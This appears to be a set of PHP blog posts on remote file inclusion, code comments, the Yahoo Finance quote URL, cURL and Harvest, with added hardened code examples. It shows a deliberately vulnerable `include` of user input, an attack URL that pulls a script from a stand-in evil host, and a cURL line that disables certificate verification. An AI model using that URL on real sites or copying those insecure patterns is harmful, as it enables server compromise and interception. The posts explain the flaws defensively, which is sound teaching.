Remote Code Execution is a security vulnerability where a malicious user manipulates input or a URL to run code from a remote location. Unlike Cross Site Scripting (XSS), where only the user is affected, Remote Code Execution could run scripts that delete all files on your server. This security risk, like most vulnerabilities, comes from insufficient validation of user input to the application.

Vulnerability Example

Let's imagine we built a dynamic application that takes a page query parameter to determine which PHP page to display to the user. In this case the back end code could look something like:

$page = $_GET['page'];
include $page;

As you may notice, a malicious user could manipulate the query parameter to point to a file on their own server.

http://www.example.com/?page=http://www.evil-site-name.com/destroy.php

Doing so would cause their file to run with the permissions of your own server, giving them access to delete or modify content on your server in addition to finding out server information.

How to Protect your code

Protecting your code is a simple practice: validate user input! Verify that the information your users enter matches what you are expecting, or make sure that it is properly escaped. The best method is white listing, where you check input against a list of allowed values, as opposed to black listing, where you try to check against invalid input; in most cases there are many more invalid cases than valid ones. To check whether you are vulnerable, look for places where you run exec, include, require, file_get_contents, or similar functions on user input without first testing that the user supplied what you were expecting, even if it is a POST variable.
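The following is an added example, not code from the original post: the vulnerable include from above placed next to a white-listed version, in which the page parameter is compared against the fixed set of pages the application knows about before anything is included. The page names ("home", "about", "contact") and the "pages/" directory are assumptions made for illustration.

```php
<?php
// Added example (not from the original post). The page names and the
// pages/ directory below are assumptions for illustration.

// Vulnerable form, as shown in the post: whatever the user supplies is
// included, which with allow_url_include enabled can be a remote URL.
//
//   $page = $_GET['page'];
//   include $page;

/**
 * Map the raw "page" query value to a file under pages/, or null if rejected.
 *
 * White list: the input is compared against the fixed set of pages the
 * application knows about. Anything else is refused rather than "cleaned".
 *
 * @param string $requested Raw value of $_GET['page']
 * @return string|null Absolute path to include, or null when not allowed
 */
function resolvePage(string $requested): ?string
{
    static $allowed = ['home', 'about', 'contact'];   // assumed page names

    // Strict comparison: "0", "home\0" or "HOME" do not match a list entry.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    return __DIR__ . '/pages/' . $requested . '.php';
}

/**
 * Alternative for large page sets: constrain the shape of the name, then
 * confirm that the resolved file really lives inside pages/.
 */
function resolvePageByPattern(string $requested): ?string
{
    // Only lower-case letters and digits: no dots, slashes or scheme prefixes.
    if (!preg_match('/^[a-z0-9]{1,32}$/', $requested)) {
        return null;
    }
    $base = realpath(__DIR__ . '/pages');
    $file = realpath(__DIR__ . '/pages/' . $requested . '.php');
    // realpath() returns false for a missing file; the prefix check rejects a
    // file that resolved (through a symlink, for example) outside the directory.
    if ($base === false || $file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

// Refuse anything that is not a plain string (page[]=x arrives as an array).
$requested = $_GET['page'] ?? 'home';
$page = is_string($requested) ? resolvePage($requested) : null;

if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $page;
```

Note that the include now only ever sees a path the application built itself; the user's value selects an entry from the list, it never becomes part of a path or URL directly. As defence in depth, leave PHP's allow_url_include setting Off in php.ini so that include cannot fetch remote code even if a check is missed elsewhere.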


Why spend the time to comment your code?

As programmers we spend our time writing code, from simple one line scripts to complex applications. No matter what the size, adding comments and documenting your code adds to the longevity of your project. The reason I say this is that if you write a library to perform a certain set of operations or to interact with a protocol or app, you have a choice: spend the time adding comments, or leave them out to get it done faster. Let's say a year goes by and all of a sudden the interface you integrate with has been upgraded. You or those that utilize your code are now faced with a dilemma: update the existing code, or rewrite from scratch. If you had taken the time to document your code well, there is a better chance that your code will be updated, as you or the developers should be able to easily find the elements that need to be modified or replaced. Documenting your code well in an open source environment also allows the code to be easily enhanced or debugged for a user's particular needs.

In-line commenting

In-line commenting is the placement of comments next to individual statements to describe what action the line is performing. How much of this type of commenting is needed is up to the programmer. Some programmers choose to only comment sections that contain obscure functionality or special cases; others prefer to comment every line. Myself, I find that there is a balance to be drawn in describing what a section of code performs in addition to any critical pieces.

// executes the curl request
$result = curl_exec($ch);

File, Class, Method, and Property Documenting

Arguably, documenting at the method, property, and class level is the most important aspect of documentation. By documenting these elements well, a user can quickly and easily know what functions they need to interact with and how to go about using the various classes. phpDocumentor is the standard auto-documenting tool for the PHP language. It functions similarly to Javadoc in that you write comment block headers for functions, parameters, classes, and PHP files that describe the element's purpose and the various parameters that go into it.

For example, a method comment block would contain a description of the method, any parameters that are expected, return value information, and also details on any Exceptions that could be thrown. For a full list of all available tags you can review the tutorial on phpDocumentor’s main website.

/**
* Method for importing existing schema to Doctrine_Record classes
*
* @param string $directory Directory to write your models to
* @param array $databases Array of databases to generate models for
* @param array $options Array of options
* @return boolean
* @throws Exception
*/
public static function generateModelsFromDb($directory, array $databases = array(), array $options = array())
{
    return Doctrine_Manager::connection()->import->importSchema($directory, $databases, $options);
}

Conclusion

Commenting makes it possible for other programmers, from beginners to advanced, to easily review and understand your code. To further help users, phpDocumentor has the ability to build and export customizable HTML pages that can serve as a reference for utilizing the code without looking at the source. This is extremely helpful for users of libraries who only need to know how to use the code and not how it actually works. How to install and use the doc builder is outlined in the phpDocumentor tutorial.


Yahoo Finance Stock API?

The Yahoo Finance Stock API appears to be both commonly and uncommonly known to the public.  The API is most easily seen by performing a stock quote search on the Yahoo Finance website and then selecting the “Download Data” link in the page details.  Looking at the link would show a url that looks similar to http://download.finance.yahoo.com/d/quotes.csv?s=DELL&f=sl1d1t1c1ohgv&e=.csv, this is the Yahoo Finance Stock API.

Deciphering the URL

We can break up the URL into 4 distinct elements:

  1. Base URL of the request.
    http://download.finance.yahoo.com/d/quotes.csv
  2. Stock symbols that you want information about are passed as a plus (+) delimited string in the s parameter of the query.
    s=DELL+RHI
  3. Fields that you want are passed as obscure letter codes in the f parameter of the query. A sample of values that can be obtained is found at the end of this entry. One important item to notice is that there is no space or delimiting character between the codes.
    f=sl1d1t1c1ohgv
  4. Return format of the data, which will most likely always be csv, is set by the e query parameter.
    e=.csv

Placing all that information together you can easily obtain financial information on any stock including but not limited to such information as the latest stock quote, daily high + low, 52 week high + low, the day’s range, previous day’s close, and today’s open price.  Creating a simple PHP or AJAX script would allow you to quickly show your website visitors how stocks are doing.

Sample list of data codes

  • g: Day’s Low
  • h: Day’s High
  • o: Open
  • p: Previous Close
  • n: Name
  • w2: 52 Week Range
  • l1: Latest Stock Quote

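As an added example (not code from the original post), the script below puts the four URL elements together in PHP and parses the CSV that such a request returns, mapping each column back to the field codes listed above. The ticker symbols are validated before they are placed in the URL, since in a real site they would come from a visitor. The CSV response embedded in the script is constructed sample data, not a real quote, so the script runs offline; fetching the live URL would be done with cURL as described in the next entry.

```php
<?php
// Added example (not from the original post). The sample CSV below is
// constructed for offline illustration and is not real market data.

/** Field code => column name, taken from the post's sample list of codes. */
const FIELD_NAMES = [
    's'  => 'Symbol',
    'n'  => 'Name',
    'l1' => 'Latest Stock Quote',
    'o'  => 'Open',
    'g'  => "Day's Low",
    'h'  => "Day's High",
    'p'  => 'Previous Close',
    'w2' => '52 Week Range',
];

/**
 * Build the quotes.csv URL from the four elements described in the post.
 *
 * @param string[] $symbols Ticker symbols, e.g. ['DELL', 'RHI']
 * @param string[] $fields  Field codes in the order the columns should come back
 */
function buildQuoteUrl(array $symbols, array $fields): string
{
    // Symbols come from users, so they are held to a tight pattern before
    // going into the query string; "DELL&f=..." can never rewrite the URL.
    foreach ($symbols as $symbol) {
        if (!preg_match('/^[A-Z0-9.\-^]{1,10}$/', $symbol)) {
            throw new InvalidArgumentException("Rejected symbol: $symbol");
        }
    }
    foreach ($fields as $code) {
        if (!isset(FIELD_NAMES[$code])) {
            throw new InvalidArgumentException("Unknown field code: $code");
        }
    }
    // 1. base URL, 2. plus-delimited symbols, 3. codes run together, 4. format
    return 'http://download.finance.yahoo.com/d/quotes.csv'
        . '?s=' . implode('+', $symbols)
        . '&f=' . implode('', $fields)
        . '&e=.csv';
}

/**
 * Parse the CSV body into one associative array per symbol, keyed by column name.
 *
 * @param string   $csv    Raw response body
 * @param string[] $fields The same field codes the request was built with
 * @return array<int, array<string, string>>
 */
function parseQuoteCsv(string $csv, array $fields): array
{
    $rows = [];
    foreach (preg_split('/\r\n|\n|\r/', trim($csv)) as $line) {
        if ($line === '') {
            continue;
        }
        $cols = str_getcsv($line, ',', '"', '\\');
        // A column count that does not match the request means the response
        // is not what we asked for; refuse it rather than mislabel the data.
        if (count($cols) !== count($fields)) {
            throw new UnexpectedValueException(
                'Expected ' . count($fields) . ' columns, got ' . count($cols));
        }
        $row = [];
        foreach ($fields as $i => $code) {
            $row[FIELD_NAMES[$code]] = $cols[$i];
        }
        $rows[] = $row;
    }
    return $rows;
}

$fields = ['s', 'n', 'l1', 'o', 'g', 'h', 'p', 'w2'];

// Constructed sample response matching $fields (not real market data).
$sampleCsv = "\"DELL\",\"Dell Inc.\",14.25,14.10,14.02,14.40,14.15,\"11.30 - 17.90\"\n"
           . "\"RHI\",\"Robert Half International\",30.50,30.20,30.05,30.75,30.30,\"22.10 - 35.00\"\n";

echo buildQuoteUrl(['DELL', 'RHI'], $fields), "\n";
// -> http://download.finance.yahoo.com/d/quotes.csv?s=DELL+RHI&f=snl1oghpw2&e=.csv

foreach (parseQuoteCsv($sampleCsv, $fields) as $quote) {
    printf("%-5s %-28s last %s (prev %s, range %s)\n",
        $quote['Symbol'], $quote['Name'], $quote['Latest Stock Quote'],
        $quote['Previous Close'], $quote['52 Week Range']);
}
```

The field codes are kept in one table so that a request and the parser that reads its response are always built from the same list; a mismatch between the two is caught by the column count check instead of producing silently mislabelled values.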

What is cURL?

Client URL Library or cURL for short is a library of functions designed for the purpose of safely fetching information from remote sites.  The purpose of the library is to send a request to a server using a defined protocol (http, https, ftp, etc) and to return the result back to you for usage in your application or script.

How do I use cURL?

Using cURL is a simple 4 or 5 step process, depending on your needs.

  1. Initiate a cURL session using curl_init(). This function returns a session handle that you will use to manipulate the request.
    $ch = curl_init("http://www.example.com/");
  2. Set your options for the request using the curl_setopt() function. You can either set these options one at a time or pass an associative array that contains all of your options. Complete options can be found on the php.net curl_setopt page, but a few basic ones are:
    • CURLOPT_RETURNTRANSFER
      determines whether the result is returned as a string or output directly
    • CURLOPT_SSL_VERIFYHOST
      determines whether the server’s SSL certificate is checked against the requested host name
    • CURLOPT_POST
      sets the request to use HTTP POST
    • CURLOPT_POSTFIELDS
      sets the POST parameters to be sent with the request
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  // return the body as a string
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // disables verification of the server's certificate
  3. Execute the cURL request and, if using return transfer as a string, assign the result to a variable.
    $resp = curl_exec($ch);
  4. This step is optional: you can obtain information about the request you just performed. One of the main uses is to read the HTTP status code that was returned, to determine whether the request was successful or there was an error. To do this you use the curl_getinfo() function; full documentation can be found on the php.net curl_getinfo page.
    $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
  5. Finally, once completed, close your session to free up resources. This is done with the curl_close() function.
    curl_close($ch);
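The five steps above wrapped into one function, as an added example that is not code from the original post. It differs from the snippets above in two ways a practitioner would want: certificate verification is left on (CURLOPT_SSL_VERIFYPEER true and CURLOPT_SSL_VERIFYHOST 2, rather than turning the peer check off), and a failed transfer is distinguished from a non-2xx HTTP status. The options are set in one call with curl_setopt_array(), which is the function that takes the associative array mentioned in step 2. The URL is a placeholder.

```php
<?php
// Added example (not from the original post). https://www.example.com/ is a
// placeholder URL.

/**
 * Fetch a URL and return ['code' => int, 'body' => string].
 *
 * @param string      $url            Request URL (https recommended)
 * @param array|null  $postFields     Form fields to POST, or null for GET
 * @param int         $timeoutSeconds Connect and total timeout
 * @throws RuntimeException when the transfer itself fails (DNS, TLS, timeout)
 */
function fetchUrl(string $url, ?array $postFields = null, int $timeoutSeconds = 10): array
{
    // 1. Initiate the session; the handle is what every later call operates on.
    $ch = curl_init($url);
    if ($ch === false) {
        throw new RuntimeException('curl_init failed');
    }

    // 2. Options, passed as one associative array.
    $options = [
        CURLOPT_RETURNTRANSFER => true,   // hand the body back as a string, do not print it
        CURLOPT_SSL_VERIFYPEER => true,   // verify the server certificate against the CA store
        CURLOPT_SSL_VERIFYHOST => 2,      // and require that it matches the requested host name
        CURLOPT_FOLLOWLOCATION => false,  // do not silently follow redirects to other hosts
        CURLOPT_CONNECTTIMEOUT => $timeoutSeconds,
        CURLOPT_TIMEOUT        => $timeoutSeconds,
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTPS | CURLPROTO_HTTP, // no ftp://, file://, etc.
    ];
    if ($postFields !== null) {
        $options[CURLOPT_POST]       = true;
        $options[CURLOPT_POSTFIELDS] = http_build_query($postFields);
    }
    curl_setopt_array($ch, $options);

    try {
        // 3. Execute; with RETURNTRANSFER the body is the return value,
        //    and false means the transfer never completed.
        $body = curl_exec($ch);
        if ($body === false) {
            throw new RuntimeException('cURL error: ' . curl_error($ch));
        }
        // 4. Inspect the transfer: the HTTP status separates success from failure.
        $code = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
        return ['code' => $code, 'body' => $body];
    } finally {
        // 5. Release the handle (a no-op on PHP 8, still harmless on older versions).
        curl_close($ch);
    }
}

$result = fetchUrl('https://www.example.com/');   // placeholder URL
if ($result['code'] >= 200 && $result['code'] < 300) {
    echo "OK, ", strlen($result['body']), " bytes\n";
} else {
    echo "Request failed with HTTP ", $result['code'], "\n";
}
```

A transfer failure (curl_exec() returning false) and an error status from the server are different conditions: the first means no trustworthy response arrived at all, while the second is a response that should be handled according to its code, which is why the function raises on the former and returns the latter.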

Summary

Utilizing the cURL library in your application to talk to remote servers allows you to easily interact with the APIs provided by Harvest, Google Analytics and others. In addition, it keeps the interaction contained: your server only sends a request and reads the response, rather than running any external script.

What is Harvest?

Harvest is, simply put, an online time tracking application. Harvest works on the basic concept that your time is recorded on a per project basis and that each project belongs to a client. This allows you to easily generate an invoice for a project or at the client level, depending on your own billing needs. In addition, your time can be recorded against tasks to get detailed reports on where your time is spent on a project. Some of the key features of Harvest are outlined below.

Features

  • Time Tracking
    Harvest has an online interface for entering your time as well as desktop applications.
  • Budgets
    Harvest allows you to set budgets on a project or for specific tasks, letting you easily see which projects are over budget or which tasks are consistently over budget, so you can determine whether to allocate more resources or take further action.
  • Reports
    Harvest has various reports covering project statuses, invoices, expenses, and detailed time tracking of users, tasks, and projects.
  • Quickbooks Integration
    Harvest has the built-in ability to export time sheets to Quickbooks if you use it for billing and reporting.
  • Basecamp Integration
    Built-in integration with the Basecamp project management software.
  • API
    Harvest provides both a Time Tracking API and an extended REST API for easily accessing and managing data, allowing Harvest users to integrate Harvest reports or account management into their own applications.

Summary

Harvest is available with 3 different pricing plans, ranging in price from $12 to $90 per month. For those just starting out they offer a 30 day free trial and a free account that allows you to track 4 active clients and 2 active projects. Visit Harvest’s website to learn more and sign up today.
